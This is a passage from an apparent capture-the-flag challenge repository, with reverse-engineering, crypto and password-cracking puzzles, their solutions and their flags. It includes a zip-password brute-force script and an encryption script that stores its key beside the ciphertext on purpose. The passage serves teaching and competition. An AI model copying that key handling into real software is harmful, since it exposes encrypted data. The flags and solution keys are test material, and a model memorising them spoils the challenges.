2959) 35 | (#\@ 2208) 36 | (#\A 1805) 37 | (#\B 1772) 38 | (#\C 232) 39 | (#\D 3998) 40 | (#\E 2534) 41 | (#\F 1609) 42 | (#\G 1024) 43 | (#\H 3721) 44 | (#\I 1832) 45 | (#\J 241) 46 | (#\K 2213) 47 | (#\L 2917) 48 | (#\M 3199) 49 | (#\N 1415) 50 | (#\O 3242) 51 | (#\P 561) 52 | (#\Q 1038) 53 | (#\R 3934) 54 | (#\S 278) 55 | (#\T 3257) 56 | (#\U 753) 57 | (#\V 2724) 58 | (#\W 128) 59 | (#\X 572) 60 | (#\Y 332) 61 | (#\Z 3536) 62 | (#\[ 1856) 63 | (#\\ 2018) 64 | (#\] 2291) 65 | (#\^ 284) 66 | (#\_ 2692) 67 | (#\` 71) 68 | (#\a 2642) 69 | (#\b 1340) 70 | (#\c 3238) 71 | (#\d 1939) 72 | (#\e 2491) 73 | (#\f 2605) 74 | (#\g 3092) 75 | (#\h 2029) 76 | (#\i 3768) 77 | (#\j 3112) 78 | (#\k 2053) 79 | (#\l 3875) 80 | (#\m 3434) 81 | (#\n 2820) 82 | (#\o 3107) 83 | (#\p 3932) 84 | (#\q 910) 85 | (#\r 3218) 86 | (#\s 1426) 87 | (#\t 1661) 88 | (#\u 3311) 89 | (#\v 3303) 90 | (#\w 2016) 91 | (#\x 366) 92 | (#\y 1304) 93 | (#\z 3644) 94 | (#\{ 1078) 95 | (#\| 3226) 96 | (#\} 3025) 97 | (#\~ 1684) 98 | (otherwise 0))) 99 | 100 | (defun gen-key-h (s) 101 | (let* ( 102 | (s1 (reverse s)) 103 | (s2 (map 'list (lambda (i) (+ (* -4 i i) (* 7 i) -2)) s1)) 104 | (s3 (map 'list (lambda (i) (elt s2 i)) 105 | '(46 28 40 39 2 27 18 23 31 16 29 48 38 12 35 42 32 49 19 21 14 3 34 5 30 13 4 7 25 22 8 11 50 47 41 15 1 36 33 17 10 37 0 43 44 26 45 20 24 6 51 9))) 106 | (s4 (map 'list '+ s3 (append (cdr s3) (list (car s3))))) 107 | (s5 s4) 108 | (s6 s5) 109 | (s7 (map 'list (lambda (i) (elt s6 i)) 110 | '(18 31 4 13 39 36 3 19 1 8 22 16 5 30 23 0 7 48 46 20 26 6 24 10 41 49 9 34 2 12 37 28 51 50 15 47 40 32 27 42 33 35 25 43 11 45 38 29 17 44 21 14))) 111 | (s8 (map 'list (lambda (x) (* x x x)) s7)) 112 | (s9 (map 'list #'abs s8)) 113 | (s10 (map 'list #'logxor s9 (append (cdr s9) (list (car s9))))) 114 | (s11 (map 'list #'isqrt s10)) 115 | (s12 (map 'list (lambda (x) (* x x x)) s11)) 116 | (s13 s12) 117 | (s14 (map 'list '- s13 s2)) 118 | (s15 (map 'list #'abs s14)) 119 | (s16 (map 'list 
(lambda (x) (logand x 4095)) s15))) 120 | s16)) 121 | 122 | (defun gen-key (s) 123 | (loop for i from 1 to 512 do (setq s (gen-key-h s))) 124 | s) 125 | 126 | (defun verify-flag (f) 127 | (cond 128 | ((= (length f) 52) 129 | (let* ((l (map 'list #'char-map f)) 130 | (k (gen-key (loop for i from 1 to 52 collect (* i i)))) 131 | (r (map 'list #'logxor l k)) 132 | (c '(3472 2481 3691 2476 650 3021 260 3972 3888 2025 637 1853 1481 2679 2459 35 706 669 133 | 2794 2383 3041 3855 2203 1178 577 1942 1417 2513 111 1888 3977 933 1399 2705 1902 134 | 3481 3474 3 1349 199 297 1481 3230 1253 3062 1853 246 6 3097 849 4071 2000))) 135 | (cond ((equal r c) "Valid") 136 | (t "Invalid")))) 137 | (t "Invalid"))) 138 | -------------------------------------------------------------------------------- /bin/win-bin-analysis/README.md: -------------------------------------------------------------------------------- 1 | # win-bin-analysis 2 | 3 | # Challenge Text 4 | * Find the key hidden in the Windows executable files. 5 | 6 | # Hint 7 | * .exe's aren't the only type of executable file. 8 | * https://www.aesencryptiononline.com/2022/03/aes-encryption-function-ontools.html 9 | 10 | # Solution 11 | 12 | Analyze the .dll (not the .exe) in Ghidra and search for strings. You will find a bunch of strings that get output when the file is executed; take one of the strings and decrypt it, using another of the strings as the key and the string that names the encryption algorithm to choose the cipher.
13 | 14 | ```````````` 15 | password: HKEY_CURRENT_USER 16 | encryption: AES(CBC) 17 | fakeFlag: njsctf{look-harder} 18 | encrypt: flag-U2FsdGVkX1+/+Gg+TT1OswZb7zJBF954sV9CPYr9yjuECuBh60j/qG3Kw4Hk9/l6fu5ibkYarZWNBByLBuGrYQ== 19 | ```````````` 20 | 21 | * Flag: `jctf{00g@_B000G@@_B1LL_G8S_wAs-H3Re}` 22 | 23 | ## Credit 24 | * Developed by [Christian](https://github.com/Person1080p) 25 | -------------------------------------------------------------------------------- /bin/win-bin-analysis/challenge/winBinAnalysis.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/win-bin-analysis/challenge/winBinAnalysis.zip -------------------------------------------------------------------------------- /bin/win-bin-analysis/src.cs: -------------------------------------------------------------------------------- 1 | using System.Diagnostics; 2 | int coolfunction(string input) 3 | { 4 | Process.Start("cmd.exe", "/K tree"); 5 | string output = "AES(CBC)"; //encyrption for key 6 | return 2345325; 7 | } 8 | 9 | Process.Start("cmd.exe", "/K tree"); 10 | Console.WriteLine($"You really shouldn't run exe's from people that you dont trust {Environment.UserName}"); 11 | Console.WriteLine($"SENDING HKEY_CLASSES_ROOT/.386/PersistentHandler {Environment.NewLine}Date: {DateTime.Now:d} Time: {DateTime.Now:t}"); 12 | coolfunction("sample text"); 13 | var max = 87; 14 | var counter = -42; 15 | string encKey = "HKEY_CURRENT_USER"; //passowrd for key 16 | string words = "njsctf{look-harder}"; 17 | for (int i = 0; i < max; i++) 18 | { 19 | words = words + counter; 20 | counter += 3; 21 | 22 | } 23 | 24 | Console.WriteLine($"{Environment.NewLine} {words} "); 25 | 26 | string realKey = "U2FsdGVkX1+/+Gg+TT1OswZb7zJBF954sV9CPYr9yjuECuBh60j/qG3Kw4Hk9/l6fu5ibkYarZWNBByLBuGrYQ=="; //solution for key encrypted 27 | 28 | Console.ReadLine(); 
-------------------------------------------------------------------------------- /createWriteup.py: -------------------------------------------------------------------------------- 1 | """ 2 | filename: createWriteup.py 3 | Purpose: (Standardizaiton) To automate the process of creating a write-up 4 | Usage: python3 createWriteup.py 5 | Return(s): 6 | ./ 7 | .//solution 8 | .//README.md 9 | --> # 10 | """ 11 | 12 | import sys 13 | import os 14 | 15 | def usage(): 16 | print(f"Be sure to have your name / handle!") 17 | print(f"Usage:") 18 | print(f"python3 createWriteup.py ") 19 | 20 | 21 | # Quick Function to make a file 22 | makeFile = lambda file: open(file, "x") 23 | 24 | # main -> Returns a standardized process for a single challenge 25 | def main(name_handle): 26 | README = f"{name_handle}/README.md" 27 | 28 | # Creates `./` 29 | os.mkdir(f"{name_handle}") 30 | 31 | # Creates `.//solution` 32 | os.mkdir(f"{name_handle}/solution") 33 | 34 | # Creates `.//README.md` 35 | makeFile(f"{README}") 36 | 37 | with open(f"{README}", "r+") as f: 38 | f.write(f"# {name_handle}'s Write-up for (INSERT CHALLENGE NAME)\n") 39 | 40 | 41 | # Ensures that users are using the program correctly 42 | if __name__ == "__main__": 43 | try: 44 | name_handle = sys.argv[1] 45 | main(name_handle) 46 | except: 47 | usage() 48 | -------------------------------------------------------------------------------- /crypto/README.md: -------------------------------------------------------------------------------- 1 | # Crypto 2 | 3 | ## Easy Challenges 4 | | Challenge Name | Description | Hint 5 | |:-- | :-- | :--- 6 | | [xoracle](xoracle) | Check out my cool new encryption service! It's very secure! Connect to 0.cloud.chals.io on port 19305. | Read carefully: a small mistake or typo can be all it takes to make an encryption system insecure. 7 | | [salad](salad) | Roman generals really knew how to make salad! | Look up some common types of ciphers. 
8 | | [new-algorithm](new-algorithm) | On the first day of the job, a new cryptography intern is insisting to upper management that he developed a new encryption algorithm. | What are some differences between encryption, encoding, and hashing? 9 | 10 | ## Medium Challenges 11 | | Challenge Name | Description | Hint 12 | |:-- | :-- | :--- 13 | | [hidden-in-plain-sight](hidden-in-plain-sight) | A file contains the flag but it is encrypted. | The file looks a little longer than you would expect. 14 | | [would-you-wordle](would-you-wordle) | Someone left this secret text string and unfinished Wordle. Can you put them together to get the flag? pUpPHg3KfB15MG2KGtQQMDEECPOF8oa3VA== | Ron's Code 15 | | [secret-message](secret-message) | Could there be a secret message somewhere? | The employees of both organizations passed Decoding 101 in high school, but failed Encryption 101 in college. 16 | 17 | 18 | ## Hard Challenges 19 | | Challenge Name | Description | Hint 20 | |:-- | :-- | :--- 21 | | [file-zip-cracker](file-zip-cracker) | Fix the script to brute force the password. | No hints. 22 | | [audio-transmission](audio-transmission) | We have intercepted an audio transmission from a known criminal organization. | No hints. 23 | | [inDEStructible](inDEStructible) | It's an older code, sir or madam, but it checks out. | No hints. 24 | -------------------------------------------------------------------------------- /crypto/audio-transmission/README.md: -------------------------------------------------------------------------------- 1 | # audio-transmission 2 | 3 | **Challenged by FRSecure** 4 | 5 | ## Challenge Text 6 | * We have intercepted an audio transmission from a known criminal organization. It is obviously encrypted in some way, but we've had no luck deciphering it. Can you help us out? 
7 | * https://drive.google.com/drive/folders/1U5n9f1EC7FcTiVzA3mQV7FIuPWEtNK_3?usp=sharing OR https://drive.google.com/drive/folders/1aAu_r12oAOzDMuaJ88tE2fTQ1-wyV1vv?usp=sharing 8 | 9 | ## Hint 10 | * No hints. 11 | 12 | ## Solution 13 | * Taking a look at the spectrogram of the audio file shows several frequency bands clearly defined. The first and last frame are used as a guide to define the 8 frequencies that represent 8 bits of an ascii character. Each 200ms section represents an ascii character. Extracting the entire message from the audio file leaves you with a base64 encoded gif image. 14 | * While this entire challenge could be done manually, it has been purposefully made into a long enough message to be very inefficient. To be completed in a short amount of time, a script should be created to analyze the audio file. 15 | * Flag: `jctf{b1n4Ry_4sc1!_iN_sP3cTr0gr4M}` 16 | 17 | 18 | **Example solution code:** 19 | ``` 20 | import numpy as np 21 | from scipy.fft import * 22 | from scipy.io import wavfile 23 | import base64 24 | 25 | filename = "transmission.wav" 26 | step = 200 27 | 28 | def freq(data, sr, start_time, end_time): 29 | dataToRead = data[int(start_time * sr / 1000) : int(end_time * sr / 1000) + 1] 30 | 31 | N = len(dataToRead) 32 | yf = rfft(dataToRead) 33 | xf = rfftfreq(N, 1 / sr) 34 | 35 | freqs = [290, 250, 210, 170, 130, 90, 50, 10] 36 | f2b = [] 37 | for f in freqs: 38 | f2b += [1] if np.abs(yf[f]) > 1800000 else [0] 39 | 40 | return f2b 41 | 42 | sr, data = wavfile.read(filename) 43 | alen = (len(data)/sr) * 1000 44 | encmsg = '' 45 | 46 | for i in range(0,int(alen),step): 47 | bindata = freq(data, sr, i, i+step) 48 | encmsg += chr(int(''.join([str(c) for c in bindata]),2)) 49 | 50 | decmsg = base64.b64decode(encmsg[2:-2]) 51 | 52 | with open("output.gif", "wb") as f: 53 | f.write(decmsg) 54 | ``` 55 | 56 | 57 | ## Credit 58 | * Developed by [Eric Hanson](https://github.com/vimk1ng) 59 | 
-------------------------------------------------------------------------------- /crypto/file-zip-cracker/README.md: -------------------------------------------------------------------------------- 1 | # file-zip-cracker 2 | 3 | ## Challenge Text 4 | * We have a secret file that is password protected. However, we have obtained a wordlist of actor names, one of which is part of the password. The password is the combination of one of the names on the list with a year. 5 | * Format: "Actor_NameYYYY" 6 | * Example: "Henry_Cavill1964" 7 | * Fix the script to brute force the password. 8 | 9 | ## Hint 10 | * No hints. 11 | 12 | ## Solution 13 | 1. To fix the script: 14 | * Fix Line 23: `numbers_set = '0123456789'` 15 | * Add line 20: `file1 = open('actorList.txt', 'r')` 16 | * Add line 21: `Lines = file1.readlines()` 17 | * Add line 27: `for actor_name in Lines:` 18 | * Change line 30 to: `password = actor_name.strip()+''.join(c)` 19 | 2. After opening the folder there is a txt file that is encoded with ROT13. Use a ROT13 decoder to decode the message and get the code that unlocks the next zip file. 20 | 3. After opening the 2nd zip file, the flag is in an mp3 file. However, it is not really an mp3 file - it is actually a gif file. The file extension has to be renamed to gif to open the file. 21 | 22 | * Flag: `jctf{ew8WhHuhmv}` 23 | 24 | ## Credit 25 | * Developed by [Nishaant Goswamy](https://www.github.com/nishaant215) 26 | -------------------------------------------------------------------------------- /crypto/file-zip-cracker/challenge/FileZipCracker_Challenge_Version.py: -------------------------------------------------------------------------------- 1 | import zipfile 2 | import itertools 3 | from itertools import permutations 4 | 5 | 6 | # Function for extracting zip files to test if the password works!
7 | def extractFile(zip_file, password): 8 | try: 9 | zip_file.extractall(pwd=password.encode()) 10 | return True 11 | except KeyboardInterrupt: 12 | exit(0) 13 | except Exception as e: 14 | pass 15 | 16 | # Main code starts here... 17 | # The file name of the zip file. 18 | zipfilename = 'secret_folder.zip' 19 | 20 | 21 | 22 | 23 | numbers_set = '1235' 24 | 25 | zip_file = zipfile.ZipFile(zipfilename) 26 | 27 | 28 | for c in itertools.product(numbers_set, repeat=4): 29 | # Add the four numbers to the first half of the password. 30 | 31 | password = "Actor_Name"+''.join(c) 32 | # Try to extract the file. 33 | print("Trying: %s" % password) 34 | # If the file was extracted, you found the right password. 35 | if extractFile(zip_file, password): 36 | print('*' * 20) 37 | print('Password found: %s' % password) 38 | print('Files extracted...') 39 | exit(0) 40 | 41 | # If no password was found by the end, let us know! 42 | print('Password not found.') 43 | -------------------------------------------------------------------------------- /crypto/file-zip-cracker/challenge/actorList.txt: -------------------------------------------------------------------------------- 1 | Jensen_Ackles 2 | Johnny_Depp 3 | Andre_3000 4 | Naveen_Andrews 5 | Jensen_Atwood 6 | Tyler_Bachtel 7 | Penn_Badgley 8 | Simon_Baker 9 | Christian_Bale 10 | Eric_Balfour 11 | Eric_Bana 12 | Alex_Band 13 | Antonio_Banderas 14 | Ike_Barinholtz 15 | Ben_Barnes 16 | Eugen_Bauder 17 | William_Beckett 18 | Tyson_Beckford 19 | David_Beckham 20 | Jason_Behr 21 | Jonathan_Bennett 22 | Sam_Bennett 23 | Dierks_Bentley 24 | Gael_Garcia_Bernal 25 | Jon_Bernthal 26 | Wilson_Bethel 27 | Justin_Bieber 28 | David_Blaine 29 | James_Blake 30 | Corbin_Bleu 31 | Orlando_Bloom 32 | Jon_Bon_Jovi 33 | Asher_Book 34 | David_Boreanaz 35 | Tom_Bott 36 | Raoul_Bova 37 | Bow_Wow 38 | Marlon_Brando 39 | Adam_Brody 40 | Chris_Brown 41 | Michel_Brown 42 | Justin_Bruening 43 | Austin_Butler 44 | Gerard_Butler 45 | Santiago_Cabrera 46 | 
Bobby_Cannavale 47 | Nick_Cannon 48 | Robert_Carmine 49 | Chris_Carmack 50 | Ryan_Carnes 51 | Anthony_Catanzaro 52 | Jim_Caviezel 53 | Henry_Cavill 54 | John_Cena 55 | Justin_Chambers 56 | David_Charvet 57 | Cesar_Chiang 58 | Chingy 59 | Zachary_Chitwood 60 | Hayden_Christensen 61 | Michael_Churchill 62 | Eddie_Cibrian 63 | George_Clooney 64 | Ben_Cohen 65 | Harry_Connick_Jr. 66 | Dane_Cook 67 | Anderson_Cooper 68 | Dominic_Cooper 69 | Michael_Copon 70 | Chris_Cornell 71 | Chace_Crawford 72 | Darren_Criss 73 | Russell_Crowe 74 | Tom_Cruise 75 | Francesco_Cura' 76 | Daddy_Yankee 77 | Matt_Dallas 78 | Matt_Damon 79 | Hugh_Dancy 80 | Marco_Da_Silva 81 | Derrick_Davenport 82 | Eddie_Davenport 83 | Gabe_David 84 | Jeremy_Davison 85 | James_Dean 86 | Benicio_Del_Toro 87 | Patrick_Dempsey 88 | Johnny_Depp 89 | Charles_Dera 90 | Alexandre_Despatie 91 | Aaron_Diaz 92 | Leonardo_Dicaprio 93 | Vin_Diesel 94 | Matt_Dillon 95 | Juan_Dominic 96 | Gary_Dourdan 97 | Drake 98 | Andreas_Drakenberg 99 | Bryce_Draper 100 | George_Dubovoi 101 | Josh_Duhamel 102 | George_Eads 103 | Michael_Ealy 104 | Zac_Efron 105 | Elvis 106 | Eminem 107 | Michael_Erwin 108 | Chris_Evans 109 | Fabolous 110 | Sean_Faris 111 | Evan_Farmer 112 | Colin_Farrell 113 | Oded_Fehr 114 | Tom_Felton 115 | Ralph_Fiennes 116 | Travis_Fimmel 117 | Trent_Ford 118 | Matthew_Fox 119 | Dave_Franco 120 | James_Franco 121 | Drew_Fuller 122 | David_Fumero 123 | Franky_G 124 | Adam_Garcia 125 | Andrew_Garfield 126 | Troy_Garity 127 | Louis_Garrel 128 | Teddy_Geiger 129 | Reynaldo_Gianecchini 130 | Cam_Gigandet 131 | Nicholas_Gonzalez 132 | Rick_Gonzalez 133 | Ryan_Gosling 134 | The_Gotti_Boys 135 | Adrien_Grenier 136 | Ioan_Gruffudd 137 | Jake_Gyllenhaal 138 | Gale_Harold 139 | Josh_Hartnett 140 | Colton_Haynes 141 | Garrett_Hedlund 142 | Josh_Henderson 143 | David_Henrie 144 | Jay_Hernandez 145 | Tyler_Hilton 146 | Emile_Hirsch 147 | Josh_Holloway 148 | Marques_Houston 149 | Kris_Humphries 150 | Charlie_Hunnam 151 | 
Enrique_Iglesias 152 | Hugh_Jackman 153 | Jonathan_Jackson 154 | Thomas_Jane 155 | Ben_Jelen 156 | Derek_Jeter 157 | Avan_Jogia 158 | Aaron_Johnson 159 | Ben_Patrick_Johnson 160 | Dwayne_"The_Rock"_Johnson 161 | Rusty_Joiner 162 | Joe_Jonas 163 | Kevin_Jonas 164 | Nick_Jonas 165 | Wesley_Jonathan 166 | Steve_Jones 167 | Takeshi_Kaneshiro 168 | Gabe_Kapler 169 | Jordan_Kaye 170 | Gregory_Keith 171 | Toby_Keith 172 | Wiz_Khalifa 173 | Amir_Khan 174 | David_Kimmerle 175 | Taylor_Kitsch 176 | Johnny_Knoxville 177 | Boris_Kodjoe 178 | Lenny_Kravitz 179 | Ashton_Kutcher 180 | Shia_LaBeouf 181 | Nick_Lachey 182 | Caleb_Lane 183 | Taylor_Lautner 184 | Jude_Law 185 | Ryan_LeBar 186 | Samuel_Le_Bihan 187 | Heath_Ledger 188 | Jared_Leto 189 | Adam_Levine 190 | Jason_Lewis 191 | LL_Cool_J 192 | Laurent_Lucas 193 | Diego_Luna 194 | Kellan_Lutz 195 | Tobey_Maguire 196 | Rick_Malambri 197 | Rami_Malek 198 | Forbes_March 199 | Derek_Marrocco 200 | James_Marsden 201 | James_Marsters 202 | Ricky_Martin 203 | Olivier_Martinez 204 | Jesse_McCartney 205 | Matthew_McConaughey 206 | Neil_McDonough 207 | Ewan_McGregor 208 | Joey_McIntyre 209 | Julian_McMahon 210 | Johnny_Messner 211 | Jesse_Metcalfe 212 | Blake_Michael 213 | Frederic_Michalak 214 | Mika 215 | Wentworth_Miller 216 | Sal_Mineo 217 | Jason_Momoa 218 | Christian_Monzon 219 | Shemar_Moore 220 | Carlos_Moore 221 | Matthew_Morrison 222 | Viggo_Mortensen 223 | Dermot_Mulroney 224 | Cillian_Murphy 225 | Chad_Michael_Murray 226 | Nelly 227 | Paul_Newman 228 | Joe_Nichols 229 | Amaury_Nolasco 230 | Dylan_O'Brien 231 | Omarion 232 | Randy_Orton 233 | Clive_Owen 234 | Jared_Padalecki 235 | Hunter_Parrish 236 | Jason_Patric 237 | Marcus_Patrick 238 | Robert_Pattinson 239 | Sean_Paul 240 | Evan_Peters 241 | Alex_Pettyfer 242 | Ryan_Phillippe 243 | Joaquin_Phoenix 244 | River_Phoenix 245 | Chris_Pine 246 | Stefan_Pinto 247 | Romulo_Pires 248 | Brad_Pitt 249 | Michael_Pitt 250 | Raul_Popa 251 | Tyler_Posey 252 | Elvis_Presley 253 | 
Jason_Priestley 254 | Dominic_Purcell 255 | James_Purefoy 256 | Shawn_Pyfrom 257 | Sendhil_Ramamurthy 258 | Keanu_Reeves 259 | Steve_Reeves 260 | Simon_Rex 261 | Ryan_Reynolds 262 | Jonathan_Rhys-Meyers 263 | Patrick_Ribbsaeter 264 | Thiago_Ribeiro 265 | Caco_Ricci 266 | Tyson_Ritter 267 | Andy_Roddick 268 | Adam_Rodriguez 269 | Cristiano_Ronaldo 270 | Kenzie_Roth 271 | Brandon_Routh 272 | Mark_Ruffalo 273 | Mark_Salling 274 | Steve_Sandvoss 275 | Rodrigo_Santoro 276 | Alejo_Sauras 277 | Joseph_Sayers 278 | Marcus_Schenkenberg 279 | Dayton_Schlosser 280 | Robert_Schwartzman 281 | Seann_William_Scott 282 | Frank_Sepe 283 | David_Shaver 284 | Ryan_Sheckler 285 | Shinya 286 | Clement_Sibony 287 | Will_Smith 288 | Ian_Somerhalder 289 | Trey_Songz 290 | Soulja_Boy 291 | Hal_Sparks 292 | Scott_Speedman 293 | Edward_Speleers 294 | Jason_Statham 295 | Benjamin_Stone 296 | Richie_Stringini 297 | George_Stults 298 | Steven_Strait 299 | Daniel_Sunjata 300 | David_Sutcliffe 301 | Channing_Tatum 302 | T.I. 
303 | Lucas_Till 304 | Justin_Timberlake 305 | Adam_Tock 306 | Sonny_Tong 307 | Stuart_Townsend 308 | Tyrese 309 | Gaspard_Ulliel 310 | Karl_Urban 311 | Keith_Urban 312 | Brendon_Urie 313 | Usher 314 | Wilmer_Valderrama 315 | Mark_Valley 316 | Drew_Van_Acker 317 | Jean-Claude_Van_Damme 318 | Mark_Vanderloo 319 | Mario_Vasquez 320 | Milo_Ventimiglia 321 | Eduardo_Verastegui 322 | Rafael_Verga 323 | Jason_Wade 324 | Mark_Wahlberg 325 | Matt_Walch 326 | Paul_Walker 327 | Denzel_Washington 328 | DeAndre_Way 329 | Tom_Welling 330 | Peter_Wentz 331 | Dominic_West 332 | Shane_West 333 | Pharrell_Williams 334 | Robbie_Williams 335 | Bruce_Willis 336 | Andreas_Wilson 337 | Jamie_Wise 338 | Ronnie_Woo 339 | Elijah_Wood 340 | Christian_Yanik 341 | Will_Young 342 | Nick_Youngquest 343 | Billy_Zane 344 | Kevin_Zegers 345 | Rob_Zombie -------------------------------------------------------------------------------- /crypto/file-zip-cracker/challenge/secret_folder.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/file-zip-cracker/challenge/secret_folder.zip -------------------------------------------------------------------------------- /crypto/file-zip-cracker/solution/FileZipCracker.py: -------------------------------------------------------------------------------- 1 | import zipfile 2 | import itertools 3 | from itertools import permutations 4 | 5 | 6 | # Function for extracting zip files to test if the password works! 7 | def extractFile(zip_file, password): 8 | try: 9 | zip_file.extractall(pwd=password.encode()) 10 | return True 11 | except KeyboardInterrupt: 12 | exit(0) 13 | except Exception as e: 14 | pass 15 | 16 | # Main code starts here... 17 | # The file name of the zip file. 
18 | zipfilename = 'secret_folder.zip' 19 | 20 | file1 = open('actorList.txt', 'r') 21 | Lines = file1.readlines() 22 | 23 | numbers_set = '0123456789' 24 | 25 | zip_file = zipfile.ZipFile(zipfilename) 26 | 27 | for actor_name in Lines: 28 | for c in itertools.product(numbers_set, repeat=4): 29 | 30 | password = actor_name.strip()+''.join(c) 31 | # Try to extract the file. 32 | print("Trying: %s" % password) 33 | # If the file was extracted, you found the right password. 34 | if extractFile(zip_file, password): 35 | print('*' * 20) 36 | print('Password found: %s' % password) 37 | print('Files extracted...') 38 | exit(0) 39 | 40 | # If no password was found by the end, let us know! 41 | print('Password not found.') 42 | -------------------------------------------------------------------------------- /crypto/file-zip-cracker/solution/secret_folder.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/file-zip-cracker/solution/secret_folder.zip -------------------------------------------------------------------------------- /crypto/file-zip-cracker/solution/secret_folder/compressed_file.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/file-zip-cracker/solution/secret_folder/compressed_file.zip -------------------------------------------------------------------------------- /crypto/file-zip-cracker/solution/secret_folder/compressed_file/Flag.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/crypto/file-zip-cracker/solution/secret_folder/compressed_file/Flag.gif 
-------------------------------------------------------------------------------- /crypto/file-zip-cracker/solution/secret_folder/msg.txt: -------------------------------------------------------------------------------- 1 | 2 | Encoded Message: 3 | 4 | Gur pbqr gb haybpx gur mvc svyr vf: v'ir_tbg_n_wne_bs_qveg_naq_thrff_jung'f_vafvqr_vg -------------------------------------------------------------------------------- /crypto/hidden-in-plain-sight/README.md: -------------------------------------------------------------------------------- 1 | # hidden-in-plain-sight 2 | 3 | ## Challenge Text 4 | A file contains the flag, but it is encrypted. Normally this would be impossible to crack, but you have the encryption algorithm source code in front of you. Try to sift through it and find the vulnerabilities that can get that flag decrypted! 5 | 6 | ## Hint 7 | The file looks a little longer than you would expect. 8 | 9 | ## Solution 10 | * Create a decryptor based on the lengths of the IV and the key, both of which are stored at the end of the encrypted file (the encryption script appends the Base64-encoded IV and then the Base64-encoded key after the ciphertext). 11 | * Flag: `jctf{k3ys_hId3_wh3r3_y0u_l3@sT_3xpeCT_Th3m}` 12 | 13 | ## Credit 14 | * Developed by [Philip C. Okoh](https://github.com/ByridianBlack), part of [RUSEC](https://rusec.github.io/).
15 | -------------------------------------------------------------------------------- /crypto/hidden-in-plain-sight/challenge/encrypted.pco: -------------------------------------------------------------------------------- 1 | nbXg75/acDR47Zgtho29ZVnHqFb7Ikca2SNCWj9SNNe1M+J22JxBrg94feT3anuIx2dQusjf1HJ4fRamU2xGUmHL/Sctgx0ZOsSbIyuksblsjNPmajhzTpljIY0ztR/f6LH5Iq6XJ3MjpTnp4wNg4ODQXfgjyc+UPfk91le4/zIFyAMISCskjw1OYGAOHoS5zTnn5Yv9aHjVIhHX2BetXQ==QE1jUWZUalduWnI0dTd4IUElRCpHLUphTmRSZ1VrWHA= -------------------------------------------------------------------------------- /crypto/hidden-in-plain-sight/challenge/encryption.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import os 3 | from base64 import b64encode 4 | from Cryptodome.Cipher import AES 5 | from Cryptodome.Util.Padding import pad 6 | 7 | key = "" # Don't worry damien. I hid the key. Don't worry about it. This encryption program is secure. 8 | 9 | 10 | 11 | 12 | with open("flag_message_key", 'rb') as NFILE: 13 | malware_code = NFILE.read() 14 | 15 | cryptor = AES.new(key.encode("utf-8"), AES.MODE_CBC) 16 | 17 | encrypted_data = cryptor.encrypt(pad(malware_code, AES.block_size)) 18 | 19 | IV = b64encode(cryptor.iv).decode("utf-8") 20 | 21 | encrypted_data = b64encode(encrypted_data).decode("utf-8") 22 | 23 | encrypted_data += (str(IV)) 24 | RANDOMIZER = 88888888 25 | RANDOMIZER_2 = 4392049302 26 | RANDOMIZER_3 = 93029482930 27 | 28 | 29 | for x in range(1000): 30 | RANDOMIZER_temp = RANDOMIZER_2 ^ RANDOMIZER_3 31 | RANDOMIZER = RANDOMIZER_temp & 1111 32 | RANDOMIZER = RANDOMIZER * 88 33 | 34 | encrypted_data += (b64encode(key.encode("utf-8")).decode()) 35 | encrypted_dta = str(RANDOMIZER) 36 | 37 | print("Key Length: "+str(len(b64encode(key.encode('utf-8')).decode()))) 38 | 39 | print("IV Length: " + str(len(IV))) 40 | 41 | print("KEY: " + str((b64encode(key.encode("utf-8")).decode()))) 42 | 43 | print("IV: " + str(IV)) 44 | 45 | with open("encrypted.pco", 
'a') as NFILE: 46 | NFILE.write(encrypted_data) 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 271 | 272 | 273 | 274 | 275 | 276 | 277 | 278 | 279 | 280 | 281 | # Hey damian slight hicup but I actually don't have the key at hand and I can't just send it to you over the internet 282 | # Anyway just remember that the IV is of length 24 and the key is length 44. Follow the algorithm and you should 283 | # be able to decrypt just about any message. Alright champ? Alright. Good talk. See ya. I hope you get this message. 284 | # I put it 